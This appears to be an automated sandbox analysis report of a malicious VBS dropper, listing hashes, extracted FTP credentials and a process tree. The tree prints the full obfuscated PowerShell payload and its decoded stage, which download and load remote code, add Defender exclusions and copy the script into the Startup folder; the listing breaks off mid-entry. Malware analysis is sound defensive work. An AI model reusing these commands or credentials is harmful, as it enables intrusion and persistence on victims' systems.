Analysis

  • max time kernel
    148s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240910-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-10-2024 02:07

General

  • Target

    ATT000211189221100.vbs

  • Size

    550KB

  • MD5

    f4c17c1f9588b303483c9179052b6ff4

  • SHA1

    3b2a424c407a7908e6c697bb18e710dd3118d725

  • SHA256

    06d4033beea299846b24d41f118f1f6469e0cd8a9a04818f1a618afe80a722a8

  • SHA512

    2486f796f967527650f5b0883614d65506b73b4b7ee23db9d69278852562ccf90b7d916605871aa545c24960e7cc7ede58fbb1be2ae193e57a3141cc61db29b7

  • SSDEEP

    1536:pBBBBBBBBBBBBBBBBBY////////////////////////////////////////////M:8pU

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    ftp.desckvbrat.com.br
  • Port:
    21
  • Username:
    desckvbrat1
  • Password:
    developerpro21578Jp@@

Signatures

  • Blocklisted process makes network request 43 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4696
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9уЦϚDsуЦϚKQуЦϚgуЦϚCkуЦϚIуЦϚуЦϚnуЦϚGUуЦϚdQByуЦϚHQуЦϚJwуЦϚgуЦϚCwуЦϚIуЦϚBYуЦϚFуЦϚуЦϚVQB1уЦϚGgуЦϚJуЦϚуЦϚgуЦϚCwуЦϚIуЦϚуЦϚnуЦϚGgуЦϚdуЦϚB0уЦϚHуЦϚуЦϚcwуЦϚ6уЦϚC8уЦϚLwBlуЦϚHYуЦϚaQByуЦϚHQуЦϚdQBhуЦϚGwуЦϚcwBlуЦϚHIуЦϚdgBpуЦϚGMуЦϚZQBzуЦϚHIуЦϚZQB2уЦϚGkуЦϚZQB3уЦϚHMуЦϚLgBjуЦϚG8уЦϚbQуЦϚvуЦϚHIуЦϚcwB0уЦϚC4уЦϚdуЦϚB4уЦϚHQуЦϚJwуЦϚgуЦϚCgуЦϚIуЦϚBdуЦϚF0уЦϚWwB0уЦϚGMуЦϚZQBqуЦϚGIуЦϚbwBbуЦϚCуЦϚуЦϚLуЦϚуЦϚgуЦϚGwуЦϚbуЦϚB1уЦϚG4уЦϚJуЦϚуЦϚgуЦϚCgуЦϚZQBrуЦϚG8уЦϚdgBuуЦϚEkуЦϚLgуЦϚpуЦϚCуЦϚуЦϚJwBJуЦϚFYуЦϚRgByуЦϚHуЦϚуЦϚJwуЦϚgуЦϚCgуЦϚZуЦϚBvуЦϚGgуЦϚdуЦϚBlуЦϚE0уЦϚdуЦϚBlуЦϚEcуЦϚLgуЦϚpуЦϚCcуЦϚMQBzуЦϚHMуЦϚYQBsуЦϚEMуЦϚLgуЦϚzуЦϚHkуЦϚcgBhуЦϚHIуЦϚYgBpуЦϚEwуЦϚcwBzуЦϚGEуЦϚbуЦϚBDуЦϚCcуЦϚKуЦϚBlуЦϚHуЦϚуЦϚeQBUуЦϚHQуЦϚZQBHуЦϚC4уЦϚKQуЦϚgуЦϚFoуЦϚYwBCуЦϚGMуЦϚYQуЦϚkуЦϚCуЦϚуЦϚKуЦϚBkуЦϚGEуЦϚbwBMуЦϚC4уЦϚbgBpуЦϚGEуЦϚbQBvуЦϚEQуЦϚdуЦϚBuуЦϚGUуЦϚcgByуЦϚHUуЦϚQwуЦϚ6уЦϚDoуЦϚXQBuуЦϚGkуЦϚYQBtуЦϚG8уЦϚRуЦϚBwуЦϚHуЦϚуЦϚQQуЦϚuуЦϚG0уЦϚZQB0уЦϚHMуЦϚeQBTуЦϚFsуЦϚOwуЦϚpуЦϚCуЦϚуЦϚKQуЦϚgуЦϚCcуЦϚQQуЦϚnуЦϚCуЦϚуЦϚLуЦϚуЦϚgуЦϚCcуЦϚkyE6уЦϚJMhJwуЦϚgуЦϚCgуЦϚZQBjуЦϚGEуЦϚbуЦϚBwуЦϚGUуЦϚUgуЦϚuуЦϚGcуЦϚUwB6уЦϚEMуЦϚQgBsуЦϚCQуЦϚIуЦϚуЦϚoуЦϚGcуЦϚbgBpуЦϚHIуЦϚdуЦϚBTуЦϚDQуЦϚNgBlуЦϚHMуЦϚYQBCуЦϚG0уЦϚbwByуЦϚEYуЦϚOgуЦϚ6уЦϚF0уЦϚdуЦϚByуЦϚGUуЦϚdgBuуЦϚG8уЦϚQwуЦϚuуЦϚG0уЦϚZQB0уЦϚHMуЦϚeQBTуЦϚFsуЦϚIуЦϚуЦϚ9уЦϚCуЦϚуЦϚWgBjуЦϚEIуЦϚYwBhуЦϚCQуЦϚIуЦϚBdуЦϚF0уЦϚWwBlуЦϚHQуЦϚeQBCуЦϚFsуЦϚOwуЦϚnуЦϚCUуЦϚSQBoуЦϚHEуЦϚUgBYуЦϚCUуЦϚJwуЦϚgуЦϚD0уЦϚIуЦϚBYуЦϚFуЦϚуЦϚVQB1уЦϚGgуЦϚJуЦϚуЦϚ7уЦϚCkуЦϚIуЦϚBnуЦϚFMуЦϚegBDуЦϚEIуЦϚbуЦϚуЦϚkуЦϚCуЦϚуЦϚKуЦϚBnуЦϚG4уЦϚaQByуЦϚHQуЦϚUwBkуЦϚGEуЦϚbwBsуЦϚG4уЦϚdwBvуЦϚEQуЦϚLgBzуЦϚG4уЦϚbwBrуЦϚCQуЦϚIуЦϚуЦϚ9уЦϚCуЦϚуЦϚZwBTуЦϚHoуЦϚQwBCуЦϚGwуЦϚJуЦϚуЦϚ7уЦϚDgуЦϚRgBUуЦϚFUуЦϚOgуЦϚ6уЦϚF0уЦϚZwBuуЦϚGkуЦϚZуЦϚBvуЦϚGMуЦϚbgBFуЦϚC4уЦϚdуЦϚB4уЦϚGUуЦϚVуЦϚуЦϚuуЦϚG0уЦϚZQB0уЦϚHMуЦϚeQBTуЦϚFsуЦϚIуЦϚуЦϚ9уЦϚCуЦϚуЦϚZwBuуЦϚGkуЦϚZуЦϚBvуЦϚGMуЦϚbgBFуЦϚC4уЦϚcwBuуЦϚG8уЦϚawуЦϚkуЦϚDsуЦϚKQB0уЦϚG4уЦϚZQBpуЦϚGwуЦϚQwBiуЦϚGUуЦϚVwуЦϚuуЦϚHQуЦϚZQBOуЦϚCуЦϚуЦϚdуЦϚBjуЦϚGUуЦϚagBiуЦϚE8уЦϚLQB3уЦϚGUуЦϚTgуЦϚoуЦϚCуЦϚуЦϚPQуЦϚgуЦϚHMуЦϚbgBvуЦϚGsуЦϚJуЦϚуЦϚ7уЦϚCkуЦϚKуЦϚBlуЦϚHMуЦϚbwBwуЦϚHMуЦϚaQBkуЦϚC4уЦϚcwBuуЦϚG8уЦϚawуЦϚkуЦϚDsуЦϚKQуЦϚgуЦϚCcуЦϚdуЦϚB4уЦϚHQуЦϚLgуЦϚxуЦϚDуЦϚуЦϚTуЦϚBMуЦϚEQуЦϚLwуЦϚxуЦϚDуЦϚуЦϚLwByуЦϚGUуЦϚdуЦϚBwуЦϚHkуЦϚcgBjуЦϚHуЦϚуЦϚVQуЦϚvуЦϚHIуЦϚYgуЦϚuуЦϚG0уЦϚbwBjуЦϚC4уЦϚdуЦϚBhуЦϚHIуЦϚYgB2уЦϚGsуЦϚYwBzуЦϚGUуЦϚZуЦϚуЦϚuуЦϚHуЦϚуЦϚdуЦϚBmуЦϚEуЦϚуЦϚMQB0уЦϚGEуЦϚcgBiуЦϚHYуЦϚawBjуЦϚHMуЦϚZQBkуЦϚC8уЦϚLwуЦϚ6уЦϚHуЦϚуЦϚdуЦϚBmуЦϚCcуЦϚIуЦϚуЦϚoуЦϚGcуЦϚbgBpуЦϚHIуЦϚdуЦϚBTуЦϚGQуЦϚYQBvуЦϚGwуЦϚbgB3уЦϚG8уЦϚRуЦϚуЦϚuуЦϚHMуЦϚbgBvуЦϚGsуЦϚJуЦϚуЦϚgуЦϚD0уЦϚIуЦϚBnуЦϚFMуЦϚegBDуЦϚEIуЦϚbуЦϚуЦϚkуЦϚDsуЦϚKQуЦϚnуЦϚEуЦϚуЦϚQуЦϚBwуЦϚEoуЦϚOуЦϚуЦϚ3уЦϚDUуЦϚMQуЦϚyуЦϚG8уЦϚcgBwуЦϚHIуЦϚZQBwуЦϚG8уЦϚbуЦϚBlуЦϚHYуЦϚZQBkуЦϚCcуЦϚLуЦϚуЦϚpуЦϚCkуЦϚOQуЦϚ0уЦϚCwуЦϚNgуЦϚxуЦϚDEуЦϚLуЦϚуЦϚ3уЦϚDkуЦϚLуЦϚуЦϚ0уЦϚDEуЦϚMQуЦϚsуЦϚDgуЦϚOQуЦϚsуЦϚDgуЦϚMQуЦϚxуЦϚCwуЦϚNwуЦϚwуЦϚDEуЦϚLуЦϚуЦϚ5уЦϚDkуЦϚLуЦϚуЦϚ1уЦϚDEуЦϚMQуЦϚsуЦϚDEуЦϚMуЦϚуЦϚxуЦϚCwуЦϚMуЦϚуЦϚwуЦϚDEуЦϚKуЦϚBdуЦϚF0уЦϚWwByуЦϚGEуЦϚaуЦϚBjуЦϚFsуЦϚIуЦϚBuуЦϚGkуЦϚbwBqуЦϚC0уЦϚKуЦϚуЦϚoуЦϚGwуЦϚYQBpуЦϚHQуЦϚbgBlуЦϚGQуЦϚZQByуЦϚEMуЦϚawByуЦϚG8уЦϚdwB0уЦϚGUуЦϚTgуЦϚuуЦϚHQуЦϚZQBOуЦϚC4уЦϚbQBlуЦϚHQуЦϚcwB5уЦϚFMуЦϚIуЦϚB0уЦϚGMуЦϚZQBqуЦϚGIуЦϚbwуЦϚtуЦϚHcуЦϚZQBuуЦϚCуЦϚуЦϚPQуЦϚgуЦϚHMуЦϚbуЦϚBhуЦϚGkуЦϚdуЦϚBuуЦϚGUуЦϚZуЦϚBlуЦϚHIуЦϚQwуЦϚuуЦϚHMуЦϚbgBvуЦϚGsуЦϚJуЦϚуЦϚ7уЦϚDgуЦϚRgBUуЦϚFUуЦϚOgуЦϚ6уЦϚF0уЦϚZwBuуЦϚGkуЦϚZуЦϚBvуЦϚGMуЦϚbgBFуЦϚC4уЦϚdуЦϚB4уЦϚGUуЦϚVуЦϚуЦϚuуЦϚG0уЦϚZQB0уЦϚHMуЦϚeQBTуЦϚFsуЦϚIуЦϚуЦϚ9уЦϚCуЦϚуЦϚZwBuуЦϚGkуЦϚZуЦϚBvуЦϚGMуЦϚbgBFуЦϚC4уЦϚcwBuуЦϚG8уЦϚawуЦϚkуЦϚDsуЦϚKQB0уЦϚG4уЦϚZQBpуЦϚGwуЦϚQwBiуЦϚGUуЦϚVwуЦϚuуЦϚHQуЦϚZQBOуЦϚCуЦϚуЦϚdуЦϚBjуЦϚGUуЦϚagBiуЦϚE8уЦϚLQB3уЦϚGUуЦϚTgуЦϚoуЦϚCуЦϚуЦϚPQуЦϚgуЦϚHMуЦϚbgBvуЦϚGsуЦϚJуЦϚуЦϚ7уЦϚGcуЦϚUwB6уЦϚEMуЦϚQgBsуЦϚCQуЦϚOwуЦϚyуЦϚDEуЦϚcwBsуЦϚFQуЦϚOgуЦϚ6уЦϚF0уЦϚZQBwуЦϚHkуЦϚVуЦϚBsуЦϚG8уЦϚYwBvуЦϚHQуЦϚbwByуЦϚFуЦϚуЦϚeQB0уЦϚGkуЦϚcgB1уЦϚGMуЦϚZQBTуЦϚC4уЦϚdуЦϚBlуЦϚE4уЦϚLgBtуЦϚGUуЦϚdуЦϚBzуЦϚHkуЦϚUwBbуЦϚCуЦϚуЦϚPQуЦϚgуЦϚGwуЦϚbwBjуЦϚG8уЦϚdуЦϚBvуЦϚHIуЦϚUуЦϚB5уЦϚHQуЦϚaQByуЦϚHUуЦϚYwBlуЦϚFMуЦϚOgуЦϚ6уЦϚF0уЦϚcgBlуЦϚGcуЦϚYQBuуЦϚGEуЦϚTQB0уЦϚG4уЦϚaQBvуЦϚFуЦϚуЦϚZQBjуЦϚGkуЦϚdgByуЦϚGUуЦϚUwуЦϚuуЦϚHQуЦϚZQBOуЦϚC4уЦϚbQBlуЦϚHQуЦϚcwB5уЦϚFMуЦϚWwуЦϚ7уЦϚH0уЦϚZQB1уЦϚHIуЦϚdуЦϚуЦϚkуЦϚHsуЦϚIуЦϚуЦϚ9уЦϚCуЦϚуЦϚawBjуЦϚGEуЦϚYgBsуЦϚGwуЦϚYQBDуЦϚG4уЦϚbwBpуЦϚHQуЦϚYQBkуЦϚGkуЦϚbуЦϚBhуЦϚFYуЦϚZQB0уЦϚGEуЦϚYwBpуЦϚGYуЦϚaQB0уЦϚHIуЦϚZQBDуЦϚHIуЦϚZQB2уЦϚHIуЦϚZQBTуЦϚDoуЦϚOgBdуЦϚHIуЦϚZQBnуЦϚGEуЦϚbgBhуЦϚE0уЦϚdуЦϚBuуЦϚGkуЦϚbwBQуЦϚGUуЦϚYwBpуЦϚHYуЦϚcgBlуЦϚFMуЦϚLgB0уЦϚGUуЦϚTgуЦϚuуЦϚG0уЦϚZQB0уЦϚHMуЦϚeQBTуЦϚFsуЦϚewуЦϚgуЦϚGUуЦϚcwBsуЦϚGUуЦϚfQуЦϚgуЦϚGYуЦϚLwуЦϚgуЦϚDуЦϚуЦϚIуЦϚB0уЦϚC8уЦϚIуЦϚByуЦϚC8уЦϚIуЦϚBlуЦϚHgуЦϚZQуЦϚuуЦϚG4уЦϚdwBvуЦϚGQуЦϚdуЦϚB1уЦϚGgуЦϚcwуЦϚgуЦϚDsуЦϚJwуЦϚwуЦϚDgуЦϚMQуЦϚgуЦϚHуЦϚуЦϚZQBlуЦϚGwуЦϚcwуЦϚnуЦϚCуЦϚуЦϚZуЦϚBuуЦϚGEуЦϚbQBtуЦϚG8уЦϚYwуЦϚtуЦϚCуЦϚуЦϚZQB4уЦϚGUуЦϚLgBsуЦϚGwуЦϚZQBoуЦϚHMуЦϚcgBlуЦϚHcуЦϚbwBwуЦϚDsуЦϚIуЦϚBlуЦϚGMуЦϚcgBvуЦϚGYуЦϚLQуЦϚgуЦϚCkуЦϚIуЦϚуЦϚnуЦϚHуЦϚуЦϚdQB0уЦϚHIуЦϚYQB0уЦϚFMуЦϚXуЦϚBzуЦϚG0уЦϚYQByуЦϚGcуЦϚbwByуЦϚFуЦϚуЦϚXуЦϚB1уЦϚG4уЦϚZQBNуЦϚCуЦϚуЦϚdуЦϚByуЦϚGEуЦϚdуЦϚBTуЦϚFwуЦϚcwB3уЦϚG8уЦϚZуЦϚBuуЦϚGkуЦϚVwBcуЦϚHQуЦϚZgBvуЦϚHMуЦϚbwByуЦϚGMуЦϚaQBNуЦϚFwуЦϚZwBuуЦϚGkуЦϚbQBhуЦϚG8уЦϚUgBcуЦϚGEуЦϚdуЦϚBhуЦϚEQуЦϚcуЦϚBwуЦϚEEуЦϚXуЦϚуЦϚnуЦϚCуЦϚуЦϚKwуЦϚgуЦϚFoуЦϚSwBuуЦϚFkуЦϚTQуЦϚkуЦϚCуЦϚуЦϚKуЦϚуЦϚgуЦϚG4уЦϚbwBpуЦϚHQуЦϚYQBuуЦϚGkуЦϚdуЦϚBzуЦϚGUуЦϚRуЦϚуЦϚtуЦϚCуЦϚуЦϚJwуЦϚlуЦϚEkуЦϚaуЦϚBxуЦϚFIуЦϚWуЦϚуЦϚlуЦϚCcуЦϚIуЦϚBtуЦϚGUуЦϚdуЦϚBJуЦϚC0уЦϚeQBwуЦϚG8уЦϚQwуЦϚgуЦϚDsуЦϚIуЦϚB0уЦϚHIуЦϚYQB0уЦϚHMуЦϚZQByуЦϚG8уЦϚbgуЦϚvуЦϚCуЦϚуЦϚdуЦϚBlуЦϚGkуЦϚdQBxуЦϚC8уЦϚIуЦϚBHуЦϚGMуЦϚVwBpуЦϚFIуЦϚIуЦϚBlуЦϚHgуЦϚZQуЦϚuуЦϚGEуЦϚcwB1уЦϚHcуЦϚIуЦϚBlуЦϚHgуЦϚZQуЦϚuуЦϚGwуЦϚbуЦϚBlуЦϚGgуЦϚcwByуЦϚGUуЦϚdwBvуЦϚHуЦϚуЦϚIуЦϚуЦϚ7уЦϚCkуЦϚJwB1уЦϚHMуЦϚbQуЦϚuуЦϚG4уЦϚaQB3уЦϚHуЦϚуЦϚVQBcуЦϚCcуЦϚIуЦϚуЦϚrуЦϚCуЦϚуЦϚVуЦϚByуЦϚEgуЦϚVgB1уЦϚCQуЦϚKуЦϚуЦϚgуЦϚD0уЦϚIуЦϚBHуЦϚGMуЦϚVwBpуЦϚFIуЦϚOwуЦϚpуЦϚCуЦϚуЦϚZQBtуЦϚGEуЦϚTgByуЦϚGUуЦϚcwBVуЦϚDoуЦϚOgBdуЦϚHQуЦϚbgBlуЦϚG0уЦϚbgBvуЦϚHIуЦϚaQB2уЦϚG4уЦϚRQBbуЦϚCуЦϚуЦϚKwуЦϚgуЦϚCcуЦϚXуЦϚBzуЦϚHIуЦϚZQBzуЦϚFUуЦϚXуЦϚуЦϚ6уЦϚEMуЦϚJwуЦϚoуЦϚCуЦϚуЦϚPQуЦϚgуЦϚFoуЦϚSwBuуЦϚFkуЦϚTQуЦϚkуЦϚDsуЦϚKQуЦϚnуЦϚHUуЦϚcwBtуЦϚC4уЦϚbgBpуЦϚHcуЦϚcуЦϚBVуЦϚFwуЦϚJwуЦϚgуЦϚCsуЦϚIуЦϚBUуЦϚHIуЦϚSуЦϚBWуЦϚHUуЦϚJуЦϚуЦϚgуЦϚCwуЦϚQgBLуЦϚEwуЦϚUgBVуЦϚCQуЦϚKуЦϚBlуЦϚGwуЦϚaQBGуЦϚGQуЦϚYQBvуЦϚGwуЦϚbgB3уЦϚG8уЦϚRуЦϚуЦϚuуЦϚE8уЦϚWQB3уЦϚFkуЦϚbwуЦϚkуЦϚDsуЦϚOуЦϚBGуЦϚFQуЦϚVQуЦϚ6уЦϚDoуЦϚXQBnуЦϚG4уЦϚaQBkуЦϚG8уЦϚYwBuуЦϚEUуЦϚLgB0уЦϚHgуЦϚZQBUуЦϚC4уЦϚbQBlуЦϚHQуЦϚcwB5уЦϚFMуЦϚWwуЦϚgуЦϚD0уЦϚIуЦϚBnуЦϚG4уЦϚaQBkуЦϚG8уЦϚYwBuуЦϚEUуЦϚLgBPуЦϚFkуЦϚdwBZуЦϚG8уЦϚJуЦϚуЦϚ7уЦϚCkуЦϚdуЦϚBuуЦϚGUуЦϚaQBsуЦϚEMуЦϚYgBlуЦϚFcуЦϚLgB0уЦϚGUуЦϚTgуЦϚgуЦϚHQуЦϚYwBlуЦϚGoуЦϚYgBPуЦϚC0уЦϚdwBlуЦϚE4уЦϚKуЦϚуЦϚgуЦϚD0уЦϚIуЦϚBPуЦϚFkуЦϚdwBZуЦϚG8уЦϚJуЦϚуЦϚ7уЦϚH0уЦϚOwуЦϚgуЦϚCkуЦϚJwB0уЦϚE8уЦϚTуЦϚBjуЦϚF8уЦϚSwBhуЦϚDMуЦϚWgBmуЦϚG8уЦϚWуЦϚуЦϚyуЦϚEoуЦϚSgByуЦϚFYуЦϚaуЦϚBtуЦϚFYуЦϚOQBjуЦϚG0уЦϚOQBYуЦϚHMуЦϚdQBYуЦϚG0уЦϚagуЦϚxуЦϚGcуЦϚMQуЦϚnуЦϚCуЦϚуЦϚKwуЦϚgуЦϚG8уЦϚeуЦϚBLуЦϚFUуЦϚZwуЦϚkуЦϚCgуЦϚIуЦϚуЦϚ9уЦϚCуЦϚуЦϚbwB4уЦϚEsуЦϚVQBnуЦϚCQуЦϚewуЦϚgуЦϚGUуЦϚcwBsуЦϚGUуЦϚfQуЦϚ7уЦϚCуЦϚуЦϚKQуЦϚnуЦϚDIуЦϚNуЦϚB1уЦϚFgуЦϚSgBUуЦϚHEуЦϚYQBtуЦϚGcуЦϚeQBNуЦϚHQуЦϚRgB6уЦϚGEуЦϚawBQуЦϚFIуЦϚMQBxуЦϚF8уЦϚSQB2уЦϚEcуЦϚaQBYуЦϚE4уЦϚZуЦϚBxуЦϚGEуЦϚTgуЦϚxуЦϚCcуЦϚIуЦϚуЦϚrуЦϚCуЦϚуЦϚbwB4уЦϚEsуЦϚVQBnуЦϚCQуЦϚKуЦϚуЦϚgAD0AIABvAHgASwBVAGcAJAB7ACAAKQAgAHIAbQBFAHcAagAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcwBuAGkAYQB0AG4AbwBDAC4ARQBSAFUAVABDAEUAVABJAEgAQwBSAEEAXwBSAE8AUwBTAEUAQwBPAFIAUAA6AHYAbgBlACQAIAA9ACAAcgBtAEUAdwBqACQAOwAnAD0AZABpACYAZABhAG8AbABuAHcAbwBkAD0AdAByAG8AcAB4AGUAPwBjAHUALwBtAG8AYwAuAGUAbABnAG8AbwBnAC4AZQB2AGkAcgBkAC8ALwA6AHMAcAB0AHQAaAAnACAAPQAgAG8AeABLуЦϚFUAZwAkADsAKQAgACcAdQBzAG0ALgBuAGkAdwBwAFUAXAAnACAAKwAgAFQAcgBIAFYAdQAkACAAKAAgAGwAZQBkADsAKQAoAGgAdABhAFAAcABtAGUAVAB0AGUARwA6ADoAXQBoAHQAYQBQAC4ATwBJAC4AbQBlAHQAcwB5AFMAWwAgAD0AIABUAHIASABWAHUAJAB7ACAAKQAgAEMAYgB4AFoARQAkACAAKAAgAGYAaQA7ACAAKQAyACgAcwBsAGEAdQBxAEUALgByAG8AagBhAE0ALgBuAG8AaQBzAHIAZQBWAC4AdABzAG8AaAAkACAAPQAgAEMAYgB4AFoARQAkACAAOwA=';$kahlN = $qKKzc.replace('уЦϚ' , 'A') ;$OQyCT = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $kahlN ) ); $OQyCT = $OQyCT[-1..-$OQyCT.Length] -join '';$OQyCT = $OQyCT.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs');powershell $OQyCT
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4348
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $EZxbC = $host.Version.Major.Equals(2) ;if ( $EZxbC ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$oYwYO = (New-Object Net.WebClient);$oYwYO.Encoding = [System.Text.Encoding]::UTF8;$oYwYO.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$kons = (New-Object Net.WebClient);$kons.Encoding = [System.Text.Encoding]::UTF8;$kons.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $kons.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$kons.dispose();$kons = (New-Object Net.WebClient);$kons.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $kons.DownloadString( $lBCzSg );$huUPX = 'C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.tsr/moc.sweiversecivreslautrive//:sptth' , $huUPX , 'true' ) );};"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1496
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4928
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2860
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c mkdir "C:\Users\Admin\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\"
          4⤵
            PID:3812
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATT000211189221100.vbs"
            4⤵
            • Drops startup file
            PID:4592
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs"
            4⤵
              PID:2872
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATT000211189221100.vbs"
              4⤵
              • Drops startup file
              PID:948
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs"
              4⤵
                PID:3380
              • C:\Windows\SYSTEM32\cmd.exe
                cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATT000211189221100.vbs"
                4⤵
                  PID:4908
                • C:\Windows\SYSTEM32\cmd.exe
                  cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs"
                  4⤵
                    PID:4412
                  • C:\Windows\SYSTEM32\cmd.exe
                    cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATT000211189221100.vbs"
                    4⤵
                      PID:4600
                    • C:\Windows\SYSTEM32\cmd.exe
                      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs"
                      4⤵
                        PID:2400
                      • C:\Windows\SYSTEM32\cmd.exe
                        cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATT000211189221100.vbs"
                        4⤵
                          PID:1936
                        • C:\Windows\SYSTEM32\cmd.exe
                          cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs"
                          4⤵
                            PID:3172
                          • C:\Windows\SYSTEM32\cmd.exe
                            cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATT000211189221100.vbs"
                            4⤵
                              PID:2520
                            • C:\Windows\SYSTEM32\cmd.exe
                              cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs"
                              4⤵
                                PID:1464
                              • C:\Windows\SYSTEM32\cmd.exe
                                cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATT000211189221100.vbs"
                                4⤵
                                  PID:3812
                                • C:\Windows\SYSTEM32\cmd.exe
                                  cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\ATT000211189221100.vbs"
                                  4⤵
                                    PID:1104
                                  • C:\Windows\SYSTEM32\cmd.exe
